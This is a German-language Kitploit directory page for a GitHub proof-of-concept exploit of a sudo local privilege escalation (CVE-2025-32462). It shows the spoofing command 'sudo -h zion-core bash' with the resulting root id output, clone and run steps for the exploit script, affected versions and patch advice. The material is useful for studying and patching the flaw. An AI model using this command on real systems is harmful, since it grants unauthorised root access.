Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-32462-Exploit — CVE-2025-32462 Exploit | Kitploit
Tools/GitHubGitHub/cybersentinelx1/cve-2025-32462-exploit
Privilege EscalationSchwachstellenanalyseExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubcybersentinelx1/cve-2025-32462-exploit

CVE-2025-32462-Exploit

CVE-2025-32462 Exploit

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
1vor 1 JahrNoch nicht geprüft

CVE-2025-32462-Exploit: Matrix-Sudo Ausbruch

Hostname-Spoofing-Privilegieneskalation (CVE-2025-32462)

„Du nimmst die blaue Pille… die Geschichte endet. Du nimmst die rote Pille… du bekommst root.“

Beschreibung

Dieser Exploit demonstriert eine Privilegieneskalations-Schwachstelle in sudo (CVE-2025-32462), bei der hostnamenbasierte Einschränkungen mit dem -h-Flag umgangen werden können. Der PoC erstellt eine eingeschränkte Benutzerumgebung und entkommt dieser, indem er einen whitelisteten Hostnamen spoofed, um Root-Zugriff zu erlangen.

root@kitploit:~
[user@matrix-node]$ sudo -h zion-core bash  # Whitelisteten Hostnamen spoofen
[root@matrix-node]# id                          # Root auf falschem Hostnamen erhalten!
uid=0(root) gid=0(root) groups=0(root)

Technische Details

  • Anfällige Sudo-Versionen: < 1.9.17
  • Angriffsvektor: Lokale Privilegieneskalation
  • Hauptfehler: Umgehung der Hostnamenüberprüfung über den sudo -h Parameter
  • Auswirkung: Eingeschränkte Benutzer können auf falsch konfigurierten Systemen Root erlangen

Verwendung

Repository klonen:

root@kitploit:~
git clone https://github.com/cybersentinelx1/CVE-2025-32462-Exploit.git
cd matrix-sudo-escape

Ausführbar machen und ausführen:

root@kitploit:~
chmod +x matrix-sudo-escape.sh
./matrix-sudo-escape.sh

Interaktive Anweisungen befolgen, um zu demonstrieren:

  • Erkennung der Schwachstelle CVE-2025-32462
  • Benutzererstellung
  • Einrichtung der Hostnamen-Einschränkung
  • Ausführung des Exploits
  • Bereinigung

Schutz

  • ✅ Sudo auf v1.9.17+ aktualisieren
  • ✅ Hostnamenbasierte sudo-Einschränkungen vermeiden
  • ✅ Stattdessen gruppenbasierte sudo-Richtlinien verwenden

Rechtliches

Nur für Bildungs-/Forschungszwecke. Nur auf Systemen verwenden, die Ihnen gehören oder für die Sie eine Testgenehmigung haben.

Tool herunterladen